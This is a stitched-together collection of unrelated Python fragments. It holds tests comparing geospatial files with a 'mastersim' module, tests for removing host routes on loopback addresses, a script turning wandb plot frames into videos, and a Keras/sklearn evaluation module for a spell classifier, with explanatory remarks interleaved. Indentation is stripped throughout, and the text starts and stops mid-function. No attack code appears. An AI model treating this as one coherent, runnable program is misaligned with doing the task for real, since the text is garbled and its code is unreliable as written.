filepath1 = (__location__+'/testdata/Abgrabungen_Kreis_Kleve_shapefile/Abgrabungen_Kreis_Kleve_Shape.shp')
filepath2 = (__location__+'/testdata/Abgrabungen_Kreis_Kleve_shapefile/Abgrabungen_Kreis_Kleve_Shape.shp')
assert mastersim.master(filepath1, filepath2) == 1
def test_mastersim_geojson_equal():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
assert mastersim.master(filepath1, filepath2) == 0
def test_mastersim_geotiff_equal():
filepath1 = __location__+'/testdata/wf_100m_klas.tif'
filepath2 = __location__+'/testdata/wf_100m_klas.tif'
assert mastersim.master(filepath1, filepath2) == 0
# No CRS info available
def test_mastersim_csv_equal():
filepath1 = __location__+'/testdata/Behindertenparkplaetze_Duesseldorf.csv'
filepath2 = __location__+'/testdata/Behindertenparkplaetze_Duesseldorf.csv'
assert mastersim.master(filepath1, filepath2) == 1
def test_mastersim_netcdf_equal():
filepath1 =__location__+'/testdata/ECMWF_ERA-40_subset1.nc'
filepath2 = __location__+'/testdata/ECMWF_ERA-40_subset1.nc'
assert mastersim.master(filepath1, filepath2) == 0
def test_mastersim_geopackage_equal():
filepath1 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
filepath2 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
assert mastersim.master(filepath1, filepath2) == 0
def test_mastersim_gml_equal():
filepath1 = __location__+'/testdata/3D_LoD1_33390_5664.gml'
filepath2 = __location__+'/testdata/3D_LoD1_33390_5664.gml'
assert mastersim.master(filepath1, filepath2) == 0
def test_mastersim_gml_geopackage():
filepath1 = __location__+'/testdata/3D_LoD1_33390_5664.gml'
filepath2 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
assert mastersim.master(filepath1, filepath2) == 1
def test_mastersim_netcdf_geopackage():
filepath1 = __location__+'/testdata/ECMWF_ERA-40_subset1.nc'
filepath2 = __location__+'/testdata/Queensland_Children_geopackage/census2016_cca_qld_short.gpkg'
assert mastersim.master(filepath1, filepath2) == 0.6570352358501073
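The assertion above compares a floating-point similarity score with exact equality, which breaks as soon as the underlying libraries change their rounding. A tolerance-based comparison is more robust; a sketch using the stdlib `math.isclose` (the helper name `assert_score` is hypothetical, not part of mastersim):

```python
import math

def assert_score(actual, expected, rel_tol=1e-9):
    # Compare similarity scores with a relative tolerance instead of ==.
    assert math.isclose(actual, expected, rel_tol=rel_tol), (actual, expected)

assert_score(0.6570352358501073, 0.6570352358501073)
```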
# no crs info available in the shapefile
def test_mastersim_geojson_shapefile():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.shp'
assert mastersim.master(filepath1, filepath2) == 1
# no crs info available in the csv
def test_mastersim_geojson_csv():
filepath1 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.geojson'
filepath2 = __location__+'/testdata/Baumfaellungen_Duesseldorf.csv'
assert mastersim.master(filepath1, filepath2) == 1
# no crs info available in the csv
def test_mastersim_csv_shapefile():
filepath1 = __location__+'/testdata/Baumfaellungen_Duesseldorf.csv'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.shp'
assert mastersim.master(filepath1, filepath2) == 1
# no crs info available in the shapefile
def test_mastersim_geotiff_shapefile():
filepath1 = __location__+'/testdata/wf_100m_klas.tif'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.shp'
assert mastersim.master(filepath1, filepath2) == 1
# no crs info available in the shapefile
def test_mastersim_gml_shapefile():
filepath1 = __location__+'/testdata/3D_LoD1_33390_5664.gml'
filepath2 = __location__+'/testdata/Abgrabungen_Kreis_Kleve.shp'
    assert mastersim.master(filepath1, filepath2) == 1
import json
from textwrap import dedent
class TestRemoveHostRoute:
def test_invalid_host(self, host):
result = host.run('stack remove host route test')
assert result.rc == 255
assert result.stderr == 'error - cannot resolve host "test"\n'
def test_no_args(self, host):
result = host.run('stack remove host route')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "host" argument is required
{host ...} {address=string} [syncnow=string]
''')
def test_no_host_matches(self, host):
result = host.run('stack remove host route a:test address=127.0.0.3')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "host" argument is required
{host ...} {address=string} [syncnow=string]
''')
def test_no_address(self, host):
result = host.run('stack remove host route frontend-0-0')
assert result.rc == 255
assert result.stderr == dedent('''\
error - "address" parameter is required
{host ...} {address=string} [syncnow=string]
''')
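The expected-stderr strings above rely on `textwrap.dedent` stripping the common leading whitespace, which is what lets them be written indented inside the test body. A minimal illustration:

```python
from textwrap import dedent

expected = dedent('''\
    error - "address" parameter is required
    {host ...} {address=string} [syncnow=string]
''')
# dedent removes the shared 4-space margin from every line.
assert expected == ('error - "address" parameter is required\n'
                    '{host ...} {address=string} [syncnow=string]\n')
```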
def test_no_syncnow(self, host, revert_routing_table, revert_etc):
# Add a route with sync now so it is added to the routing table
result = host.run(
'stack add host route frontend-0-0 '
'address=127.0.0.3 gateway=127.0.0.3 syncnow=true'
)
assert result.rc == 0
# Confirm it is in the DB
result = host.run('stack list host route frontend-0-0 output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'gateway': '127.0.0.3',
'host': 'frontend-0-0',
'interface': None,
'netmask': '255.255.255.255',
'network': '127.0.0.3',
'source': 'H',
'subnet': None
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.0',
'network': '224.0.0.0',
'source': 'G',
'subnet': 'private'
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.255',
'network': '255.255.255.255',
'source': 'G',
'subnet': 'private'
}
]
# Also check that the test route is in our routing table
result = host.run('ip route list')
assert result.rc == 0
assert '127.0.0.3 via 127.0.0.3' in result.stdout
		# Now remove it from the DB, but don't sync
result = host.run('stack remove host route frontend-0-0 address=127.0.0.3')
assert result.rc == 0
# Confirm it is no longer in the DB
result = host.run('stack list host route frontend-0-0 output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.0',
'network': '224.0.0.0',
'source': 'G',
'subnet': 'private'
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.255',
'network': '255.255.255.255',
'source': 'G',
'subnet': 'private'
}
]
# Make sure it is still in the routing table
result = host.run('ip route list')
assert result.rc == 0
assert '127.0.0.3 via 127.0.0.3' in result.stdout
def test_with_syncnow(self, host, revert_routing_table, revert_etc):
# Add a route with sync now so it is added to the routing table
result = host.run(
'stack add host route frontend-0-0 '
'address=127.0.0.3 gateway=127.0.0.3 syncnow=true'
)
assert result.rc == 0
# Confirm it is in the DB
result = host.run('stack list host route frontend-0-0 output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'gateway': '127.0.0.3',
'host': 'frontend-0-0',
'interface': None,
'netmask': '255.255.255.255',
'network': '127.0.0.3',
'source': 'H',
'subnet': None
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.0',
'network': '224.0.0.0',
'source': 'G',
'subnet': 'private'
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.255',
'network': '255.255.255.255',
'source': 'G',
'subnet': 'private'
}
]
# Also check that the test route is in our routing table
result = host.run('ip route list')
assert result.rc == 0
assert '127.0.0.3 via 127.0.0.3' in result.stdout
		# Now remove it from the DB and sync
result = host.run(
'stack remove host route frontend-0-0 address=127.0.0.3 syncnow=true'
)
assert result.rc == 0
# Confirm it is no longer in the DB
result = host.run('stack list host route frontend-0-0 output-format=json')
assert result.rc == 0
assert json.loads(result.stdout) == [
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.0',
'network': '224.0.0.0',
'source': 'G',
'subnet': 'private'
},
{
'gateway': None,
'host': 'frontend-0-0',
'interface': 'eth1',
'netmask': '255.255.255.255',
'network': '255.255.255.255',
'source': 'G',
'subnet': 'private'
}
]
# Make sure it is gone from the routing table
result = host.run('ip route list')
assert result.rc == 0
assert '127.0.0.3 via 127.0.0.3' not in result.stdout
import os
import imageio
import wandb
run_dir = '/home/andrijazz/storage/saferegions/log/wandb/run-20210818_202909-rjx1cbl9/files'
plots_dir = os.path.join(run_dir, 'plots')
for f in os.scandir(plots_dir):
if not os.path.isdir(f):
continue
layer_name = f.name
layer_path = os.path.join(plots_dir, layer_name)
frames = sorted(os.listdir(layer_path))
video_file = os.path.join(layer_path, layer_name + ".mp4")
writer = imageio.get_writer(video_file, fps=2)
for frame in frames:
writer.append_data(imageio.imread(os.path.join(layer_path, frame)))
writer.close()
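Note that `sorted(os.listdir(layer_path))` orders the frame files lexicographically, so the plot frames need zero-padded numbers in their names to play back in the intended order. A quick illustration of why:

```python
# Lexicographic sorting only matches numeric order when numbers are zero-padded.
unpadded = sorted(['frame_2.png', 'frame_10.png', 'frame_1.png'])
padded = sorted(['frame_02.png', 'frame_10.png', 'frame_01.png'])
assert unpadded == ['frame_1.png', 'frame_10.png', 'frame_2.png']  # 10 sorts before 2
assert padded == ['frame_01.png', 'frame_02.png', 'frame_10.png']  # intended order
```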
# if self.config['log_video']:
# log_dict[f'saferegions/{layer_name}/video'] = wandb.Video(video_file)
def log_video(self, info, log_dict):
    # If this is the last epoch, render the per-layer videos. This is a
    # method-style snippet: it expects self.config and an active wandb run,
    # and fills the caller-provided log_dict in place.
    if self.config['train_num_epochs'] - 1 == info['epoch_idx']:
plots_dir = os.path.join(wandb.run.dir, 'plots')
for f in os.scandir(plots_dir):
if not os.path.isdir(f):
continue
layer_name = f.name
layer_path = os.path.join(plots_dir, layer_name)
frames = sorted(os.listdir(layer_path))
video_file = os.path.join(layer_path, layer_name + ".mp4")
writer = imageio.get_writer(video_file, fps=2)
for frame in frames:
writer.append_data(imageio.imread(os.path.join(layer_path, frame)))
writer.close()
if self.config['log_video']:
log_dict[f'saferegions/{layer_name}/video'] = wandb.Video(video_file)
from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Embedding, Activation, Flatten, Input, Permute, Reshape, Lambda, RepeatVector, Masking
from keras.layers import Conv1D, GlobalMaxPooling1D, LSTM, Bidirectional, SimpleRNN
from keras.optimizers import RMSprop
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from sklearn.naive_bayes import MultinomialNB
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, classification_report, confusion_matrix
from sklearn.metrics import precision_recall_fscore_support as score
from prettytable import PrettyTable
from keras.layers import merge
from numpy import argmax, average, argsort
from collections import Counter
#from stop_words import get_stop_words
import keras.backend as K
import os
import keras
import codecs
import numpy as np
import model_utils
import random
import pickle
import sklearn
import matplotlib.pyplot as plt
from sklearn.svm.libsvm import predict
LG_NAME = "MLR"
LSTM_NAME = "LSTM"
LSTM_NAME2= "2LSTM"
BILSTM_NAME = "BILSTM"
CNN_NAME = "CNN"
MLP_NAME = "MLP"
ATT_LSTM_NAME = "ATT_LSTM"
RNN_NAME = "RNN"
MAJORITY_NAME = "MAJORITY"
FILTERS="filters"
KERNEL_SIZE="kernel_size"
NEURONS = "neurons"
MLP_NEURONS="mlp_neurons"
MLP_LAYERS="mlp_layers"
DROPOUT = "dropout"
LAYERS = "layers"
EXTERNAL_EMBEDDINGS = "external_embeddings"
#EXTERNAL_EMBEDDINGS="path_embeddings"
INTERNAL_EMBEDDINGS = "internal_embeddings"
DIM_EMBEDDINGS = "dim_embeddings"
BATCH_SIZE = "batch_size"
EPOCHS = "epochs"
TIMESTEPS = "timesteps"
BIDIRECTIONAL = "bidirectional"
OUTPUT_DIR ="output_dir"
class ModelHP(object):
INDEX_TO_PAD = 0
UNK_WORD_INDEX = 1
INIT_REAL_INDEX = 2
SPECIAL_INDEXES = [INDEX_TO_PAD,UNK_WORD_INDEX]
def __init__(self):
        self.iforms = None  # re-written in the child classes
        self.ilabels = None  # re-written in the child classes
self.model = None
def _get_indexes(self,sentence):
input = [0]*(len(self.iforms)+len(self.SPECIAL_INDEXES))
for word in sentence:
if word in self.iforms:
index = self.iforms[word]
input[index]+=1
return np.array(input)
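`_get_indexes` above builds a bag-of-words count vector over the vocabulary, with the first slots reserved for the padding and unknown-word indexes. A standalone sketch of the same idea (the two-word vocabulary is hypothetical):

```python
import numpy as np

N_SPECIAL = 2  # padding index 0 and unknown-word index 1, as in ModelHP
iforms = {'accio': 2, 'lumos': 3}  # hypothetical vocabulary; real indexes start at 2

def bow_vector(sentence, iforms, n_special=N_SPECIAL):
    # One counter cell per vocabulary entry; out-of-vocabulary words are skipped.
    vec = np.zeros(len(iforms) + n_special, dtype=int)
    for word in sentence:
        if word in iforms:
            vec[iforms[word]] += 1
    return vec

v = bow_vector(['lumos', 'accio', 'lumos'], iforms)  # counts: accio=1, lumos=2
```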
def generate_data_test(self, lines, batch_size):
i = 0
while i < len(lines):
batch_sample = 0
x = []
y = []
while batch_sample < batch_size and i < len(lines):
ls = lines[i].split('\t')
y.append(self.ilabels[ls[1]])
sample = []
for w in ls[2].split():
sample.append(w)
x.append(self._get_indexes(sample))
batch_sample+=1
i+=1
x = np.array(x)
y = keras.utils.to_categorical(y, num_classes = len(self.ilabels))
if batch_size == 1:
y.reshape(-1,batch_size,y.shape[1])
yield ([x],[y])
def generate_data(self, lines, batch_size):
i = 0
while True:
batch_sample = 0
x = []
y = []
while batch_sample < batch_size:
if i >= len(lines):
i=0 #We prepare the indexes for the next iteration
ls = lines[i].split('\t')
y.append(self.ilabels[ls[1]])
sample = []
for w in ls[2].split():
sample.append(w)
x.append(self._get_indexes(sample))
batch_sample+=1
i+=1
x = np.array(x)
y = keras.utils.to_categorical(y, num_classes = len(self.ilabels))
yield ([x],[y])
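`keras.utils.to_categorical`, used in the generators above, turns integer class ids into one-hot rows. A minimal NumPy equivalent for reference:

```python
import numpy as np

def one_hot(y, num_classes):
    # Mirror of keras.utils.to_categorical for 1-D integer labels.
    out = np.zeros((len(y), num_classes))
    out[np.arange(len(y)), y] = 1.0
    return out

m = one_hot([1, 0, 2], 3)
```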
def train(self, training_data, dev_data, train_conf, name_model):
batch_size = int(train_conf[BATCH_SIZE])
epochs = int(train_conf[EPOCHS])
save_model_path = train_conf[OUTPUT_DIR]+os.sep+name_model+".hdf5"
save_callback = keras.callbacks.ModelCheckpoint(save_model_path, monitor='val_acc', verbose=0,
save_best_only=True, save_weights_only=False)
early_stopping_cb = keras.callbacks.EarlyStopping(monitor='val_acc', min_delta=0, patience=2, verbose=0, mode='auto')
history = self.model.fit_generator(self.generate_data(training_data,batch_size),
steps_per_epoch = len(training_data)/(batch_size)+1,
epochs = epochs,
validation_data = self.generate_data(dev_data, batch_size),
validation_steps=len(dev_data)/(batch_size)+1,
callbacks = [save_callback,early_stopping_cb],
verbose=1)
return history
def predict(self, test_data):
batch_size = 128
output = self.model.predict_generator(generator = self.generate_data_test(test_data,batch_size),
steps = (len(test_data)/(batch_size))+1 )
return output
def evaluate(self,test_data, test_output):
def recall_at_k(preds, gold, k):
recall = 0.
assert(len(preds)==len(gold))
for p,g in zip(preds,gold):
if g in argsort(-p)[:k]: recall+=1
return recall / len(gold)
gold_output = [self.ilabels[sample.split("\t")[1]] for sample in test_data]
counter_labels = Counter(gold_output)
        average_occ = np.average(list(counter_labels.values()))  # list() keeps this Python-3 safe
fgold_output = [g for g in gold_output if counter_labels[g] >= average_occ]
ugold_output = [g for g in gold_output if counter_labels[g] < average_occ]
predicted_output = []
fpredicted_output = []
upredicted_output = []
test_frequent_output = []
gold_frequent_output = []
test_unfrequent_output = []
gold_unfrequent_output = []
assert(len(gold_output) == len(test_output))
for j,sample_out in enumerate(test_output):
predicted_output.append(argmax(sample_out))
if counter_labels[gold_output[j]] >= average_occ:
test_frequent_output.append(sample_out)
gold_frequent_output.append(gold_output[j])
fpredicted_output.append(argmax(sample_out))
else:
upredicted_output.append(argmax(sample_out))
gold_unfrequent_output.append(gold_output[j])
test_unfrequent_output.append(sample_out)
#Calculating Recall@K with Precision@K and F1-score@K
recall_at_1 = recall_at_k(test_output, gold_output, 1)
recall_at_2 = recall_at_k(test_output, gold_output,2)
recall_at_5 = recall_at_k(test_output, gold_output, 5)
recall_at_10 = recall_at_k(test_output, gold_output, 10)
frecall_at_1 = recall_at_k(test_frequent_output, gold_frequent_output, 1)
frecall_at_2 = recall_at_k(test_frequent_output, gold_frequent_output, 2)
frecall_at_5 = recall_at_k(test_frequent_output, gold_frequent_output, 5)
frecall_at_10 = recall_at_k(test_frequent_output, gold_frequent_output, 10)
urecall_at_1 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 1)
urecall_at_2 = recall_at_k(test_unfrequent_output, gold_unfrequent_output,2)
urecall_at_5 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 5)
urecall_at_10 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 10)
precision, recall, fscore, support = score(gold_output, predicted_output)
accuracy = sklearn.metrics.accuracy_score(gold_output, predicted_output)
fprecision, frecall, ffscore, fsupport = score(fgold_output, fpredicted_output)
uprecision, urecal, ufscore, usupport = score(ugold_output, upredicted_output)
p_macro, r_macro, f_macro, support_macro = score(gold_output, predicted_output,
average = "macro")
p_micro, r_micro, f_micro, support_micro = score(gold_output, predicted_output,
average = "micro")
p_weighted, r_weighted, f_weighted, support_weighted = score(gold_output, predicted_output,
average = "weighted")
fp_macro, fr_macro, ff_macro, fsupport_macro = score(fgold_output, fpredicted_output,
average = "macro")
fp_micro, fr_micro, ff_micro, fsupport_micro = score(fgold_output, fpredicted_output,
average = "micro")
fp_weighted, fr_weighted, ff_weighted, fsupport_weigthed = score(fgold_output, fpredicted_output,
average = "weighted")
up_macro, ur_macro, uf_macro, usupport_macro = score(ugold_output, upredicted_output,
average = "macro")
up_micro, ur_micro, uf_micro, usupport_micro = score(ugold_output, upredicted_output,
average = "micro")
up_weighted, ur_weighted, uf_weighted, usupport_micro = score(ugold_output, upredicted_output,
average = "weighted")
list_summary = [accuracy, p_macro, r_macro, f_macro, p_micro, r_micro, f_micro, p_weighted, r_weighted, f_weighted,
recall_at_1, recall_at_2, recall_at_5, recall_at_10,
fp_macro, fr_macro, ff_macro, fp_micro, fr_micro, ff_micro, fp_weighted,fr_weighted, ff_weighted,
frecall_at_1, frecall_at_2, frecall_at_5, frecall_at_10,
up_macro, ur_macro,uf_macro, up_micro, ur_micro, uf_micro,up_weighted, ur_weighted, uf_weighted,
urecall_at_1, urecall_at_2 ,urecall_at_5,urecall_at_10 ]
x = PrettyTable()
# print [self.labelsi[i] for i in range(len(self.labelsi))
# if i in gold_output or i in predicted_output]
x.add_column("Label", [self.labelsi[i] for i in range(len(self.labelsi))
if i in gold_output or i in predicted_output])
x.add_column("Precision", precision)
x.add_column("Recall", recall)
x.add_column("F-score", fscore)
x.add_column("Support", support)
str_output= "Accuracy: "+str(accuracy)+"\n\n"
str_output+= "F-macro: "+str(f_macro)+"\n"
str_output+= "P-macro: "+str(p_macro)+"\n"
str_output+= "R-macro: "+str(r_macro)+"\n\n"
str_output+= "F-micro: "+str(f_micro)+"\n"
str_output+= "P-micro: "+str(p_micro)+"\n"
str_output+= "R-micro: "+str(r_micro)+"\n\n"
str_output+= "F-weighted: "+str(f_weighted)+"\n"
str_output+= "P-weighted: "+str(p_weighted)+"\n"
str_output+= "R-weighted: "+str(r_weighted)+"\n"
str_output+="Recall@1: "+str(recall_at_1)+"\n"
str_output+="Recall@2: "+str(recall_at_2)+"\n"
str_output+="Recall@5: "+str(recall_at_5)+"\n"
str_output+="Recall@10: "+str(recall_at_10)+"\n\n"
str_output+= "-------ONLY FREQUENT SPELLS-------\n\n"
str_output+= "F-macro (>="+str(average_occ)+"): "+str(ff_macro)+"\n"
str_output+= "P-macro (>="+str(average_occ)+"): "+str(fp_macro)+"\n"
str_output+= "R-macro (>="+str(average_occ)+"): "+str(fr_macro)+"\n\n"
str_output+= "F-micro (>="+str(average_occ)+"): "+str(ff_micro)+"\n"
str_output+= "P-micro (>="+str(average_occ)+"): "+str(fp_micro)+"\n"
str_output+= "R-micro (>="+str(average_occ)+"): "+str(fr_micro)+"\n\n"
str_output+= "F-weighted (>="+str(average_occ)+"): "+str(ff_weighted)+"\n"
str_output+= "P-weighted (>="+str(average_occ)+"): "+str(fp_weighted)+"\n"
str_output+= "R-weighted (>="+str(average_occ)+"): "+str(fr_weighted)+"\n\n"
str_output+="Recall@1: "+str(frecall_at_1)+"\n"
str_output+="Recall@2: "+str(frecall_at_2)+"\n"
str_output+="Recall@5: "+str(frecall_at_5)+"\n"
str_output+="Recall@10: "+str(frecall_at_10)+"\n"
        str_output+= "-------ONLY INFREQUENT SPELLS-------\n\n"
str_output+= "F-macro: (<"+str(average_occ)+"): "+str(uf_macro)+"\n"
str_output+= "P-macro: (<"+str(average_occ)+"): "+str(up_macro)+"\n"
str_output+= "R-macro: (<"+str(average_occ)+"): "+str(ur_macro)+"\n\n"
str_output+= "F-micro: (<"+str(average_occ)+"): "+str(uf_micro)+"\n"
str_output+= "P-micro: (<"+str(average_occ)+"): "+str(up_micro)+"\n"
str_output+= "R-micro: (<"+str(average_occ)+"): "+str(ur_micro)+"\n\n"
        str_output+= "F-weighted (<"+str(average_occ)+"): "+str(uf_weighted)+"\n"
        str_output+= "P-weighted (<"+str(average_occ)+"): "+str(up_weighted)+"\n"
        str_output+= "R-weighted (<"+str(average_occ)+"): "+str(ur_weighted)+"\n\n"
str_output+="Recall@1: "+str(urecall_at_1)+"\n"
str_output+="Recall@2: "+str(urecall_at_2)+"\n"
str_output+="Recall@5: "+str(urecall_at_5)+"\n"
str_output+="Recall@10: "+str(urecall_at_10)+"\n\n"
str_output+= "-------SUMMARY---------\n\n"
str_output+=str(x)
#print str(x)
labels = [self.labelsi[l] for l in predicted_output]
return str_output, list_summary, labels
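The Recall@k metric computed in `evaluate` counts a hit whenever the gold class is among the k highest-scoring outputs, via `argsort(-p)[:k]`. A self-contained version of the same computation:

```python
import numpy as np

def recall_at_k(preds, gold, k):
    # Fraction of samples whose gold class appears in the top-k predictions.
    hits = sum(1 for p, g in zip(preds, gold)
               if g in np.argsort(-np.asarray(p))[:k])
    return hits / float(len(gold))

preds = [[0.1, 0.7, 0.2], [0.5, 0.3, 0.2]]
gold = [2, 0]
```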
class MajorityClassHP(ModelHP):
def __init__(self,labels, majority_class=None):
self.name_classifier = "HP_MAJORITY"
self.majority_class = majority_class
self.ilabels ={l:i for i,l in enumerate(sorted(labels))}
self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
def train(self, training_data, dev_data, train_conf, name_model):
labels = []
for sample in training_data:
sample_split = sample.split("\t")
label,text = sample_split[1], sample_split[2]
labels.append(label)
counter = Counter(labels)
self.majority_class = counter.most_common(1)[0][0]
return None
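The majority baseline above just memorises the most frequent training label via `Counter.most_common`; with some hypothetical labels:

```python
from collections import Counter

labels = ['stupefy', 'lumos', 'stupefy', 'accio', 'stupefy']
# most_common(1) returns [(label, count)]; keep only the label.
majority_class = Counter(labels).most_common(1)[0][0]
```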
def predict(self, test_data):
return [self.ilabels[self.majority_class]]*len(test_data)
def evaluate(self,test_data, predicted_output):
def recall_at_k(preds, gold, k):
recall = 0.
for p,g in zip(preds,gold):
if g == p: recall+=1
return recall / len(gold)
gold_output = [self.ilabels[sample.split("\t")[1]]
for sample in test_data]
counter_labels = Counter(gold_output)
        average_occ = np.average(list(counter_labels.values()))  # list() keeps this Python-3 safe
fgold_output = [g for g in gold_output if counter_labels[g] >= average_occ]
ugold_output = [g for g in gold_output if counter_labels[g] < average_occ]
fpredicted_output, upredicted_output = [],[]
test_frequent_output = []
gold_frequent_output = []
test_unfrequent_output = []
gold_unfrequent_output = []
assert(len(gold_output) == len(predicted_output))
for j,sample_out in enumerate(predicted_output):
if counter_labels[gold_output[j]] >= average_occ:
fpredicted_output.append(sample_out)
test_frequent_output.append(sample_out)
gold_frequent_output.append(gold_output[j])
else:
upredicted_output.append(sample_out)
gold_unfrequent_output.append(gold_output[j])
test_unfrequent_output.append(sample_out)
#Calculating Recall@K with Precision@K and F1-score@K
recall_at_1 = recall_at_k(predicted_output, gold_output, 1)
recall_at_2 = recall_at_k(predicted_output, gold_output,2)
recall_at_5 = recall_at_k(predicted_output, gold_output, 5)
recall_at_10 = recall_at_k(predicted_output, gold_output, 10)
frecall_at_1 = recall_at_k(test_frequent_output, gold_frequent_output, 1)
frecall_at_2 = recall_at_k(test_frequent_output, gold_frequent_output, 2)
frecall_at_5 = recall_at_k(test_frequent_output, gold_frequent_output, 5)
frecall_at_10 = recall_at_k(test_frequent_output, gold_frequent_output, 10)
urecall_at_1 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 1)
urecall_at_2 = recall_at_k(test_unfrequent_output, gold_unfrequent_output,2)
urecall_at_5 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 5)
urecall_at_10 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 10)
precision, recall, fscore, support = score(gold_output, predicted_output)
accuracy = sklearn.metrics.accuracy_score(gold_output, predicted_output)
fprecision, frecall, ffscore, fsupport = score(fgold_output, fpredicted_output)
uprecision, urecal, ufscore, usupport = score(ugold_output, upredicted_output)
p_macro, r_macro, f_macro, support_macro = score(gold_output, predicted_output,
average = "macro")
p_micro, r_micro, f_micro, support_micro = score(gold_output, predicted_output,
average = "micro")
p_weighted, r_weighted, f_weighted, support_weighted = score(gold_output, predicted_output,
average = "weighted")
fp_macro, fr_macro, ff_macro, fsupport_macro = score(fgold_output, fpredicted_output,
average = "macro")
fp_micro, fr_micro, ff_micro, fsupport_micro = score(fgold_output, fpredicted_output,
average = "micro")
fp_weighted, fr_weighted, ff_weighted, fsupport_weigthed = score(fgold_output, fpredicted_output,
average = "weighted")
up_macro, ur_macro, uf_macro, usupport_macro = score(ugold_output, upredicted_output,
average = "macro")
up_micro, ur_micro, uf_micro, usupport_micro = score(ugold_output, upredicted_output,
average = "micro")
up_weighted, ur_weighted, uf_weighted, usupport_micro = score(ugold_output, upredicted_output,
average = "weighted")
list_summary = [accuracy, p_macro, r_macro, f_macro, p_micro, r_micro, f_micro, p_weighted, r_weighted, f_weighted,
recall_at_1, recall_at_2, recall_at_5, recall_at_10,
fp_macro, fr_macro, ff_macro, fp_micro, fr_micro, ff_micro, fp_weighted,fr_weighted, ff_weighted,
frecall_at_1, frecall_at_2, frecall_at_5, frecall_at_10,
up_macro, ur_macro,uf_macro, up_micro, ur_micro, uf_micro,up_weighted, ur_weighted, uf_weighted,
urecall_at_1, urecall_at_2, urecall_at_5, urecall_at_10]
x = PrettyTable()
x.add_column("Label", [self.labelsi[i] for i in range(len(self.labelsi))
if i in gold_output or i in predicted_output])
x.add_column("Precision", precision)
x.add_column("Recall", recall)
x.add_column("F-score", fscore)
x.add_column("Support", support)
str_output= "Accuracy: "+str(accuracy)+"\n\n"
str_output+= "F-macro: "+str(f_macro)+"\n"
str_output+= "P-macro: "+str(p_macro)+"\n"
str_output+= "R-macro: "+str(r_macro)+"\n\n"
str_output+= "F-micro: "+str(f_micro)+"\n"
str_output+= "P-micro: "+str(p_micro)+"\n"
str_output+= "R-micro: "+str(r_micro)+"\n\n"
str_output+= "F-weighted: "+str(f_weighted)+"\n"
str_output+= "P-weighted: "+str(p_weighted)+"\n"
str_output+= "R-weighted: "+str(r_weighted)+"\n"
str_output+="Recall@1: "+str(recall_at_1)+"\n"
str_output+="Recall@2: "+str(recall_at_2)+"\n"
str_output+="Recall@5: "+str(recall_at_5)+"\n"
str_output+="Recall@10: "+str(recall_at_10)+"\n\n"
str_output+= "-------ONLY FREQUENT SPELLS-------\n\n"
str_output+= "F-macro (>="+str(average_occ)+"): "+str(ff_macro)+"\n"
str_output+= "P-macro (>="+str(average_occ)+"): "+str(fp_macro)+"\n"
str_output+= "R-macro (>="+str(average_occ)+"): "+str(fr_macro)+"\n\n"
str_output+= "F-micro (>="+str(average_occ)+"): "+str(ff_micro)+"\n"
str_output+= "P-micro (>="+str(average_occ)+"): "+str(fp_micro)+"\n"
str_output+= "R-micro (>="+str(average_occ)+"): "+str(fr_micro)+"\n\n"
str_output+= "F-weighted (>="+str(average_occ)+"): "+str(ff_weighted)+"\n"
str_output+= "P-weighted (>="+str(average_occ)+"): "+str(fp_weighted)+"\n"
str_output+= "R-weighted (>="+str(average_occ)+"): "+str(fr_weighted)+"\n"
str_output+="Recall@1: "+str(frecall_at_1)+"\n"
str_output+="Recall@2: "+str(frecall_at_2)+"\n"
str_output+="Recall@5: "+str(frecall_at_5)+"\n"
str_output+="Recall@10: "+str(frecall_at_10)+"\n"
        str_output+= "-------ONLY INFREQUENT SPELLS-------\n\n"
str_output+= "F-macro: (<"+str(average_occ)+"): "+str(uf_macro)+"\n"
str_output+= "P-macro: (<"+str(average_occ)+"): "+str(up_macro)+"\n"
str_output+= "R-macro: (<"+str(average_occ)+"): "+str(ur_macro)+"\n\n"
str_output+= "F-micro: (<"+str(average_occ)+"): "+str(uf_micro)+"\n"
str_output+= "P-micro: (<"+str(average_occ)+"): "+str(up_micro)+"\n"
str_output+= "R-micro: (<"+str(average_occ)+"): "+str(ur_micro)+"\n\n"
        str_output+= "F-weighted (<"+str(average_occ)+"): "+str(uf_weighted)+"\n"
        str_output+= "P-weighted (<"+str(average_occ)+"): "+str(up_weighted)+"\n"
        str_output+= "R-weighted (<"+str(average_occ)+"): "+str(ur_weighted)+"\n"
str_output+="Recall@1: "+str(urecall_at_1)+"\n"
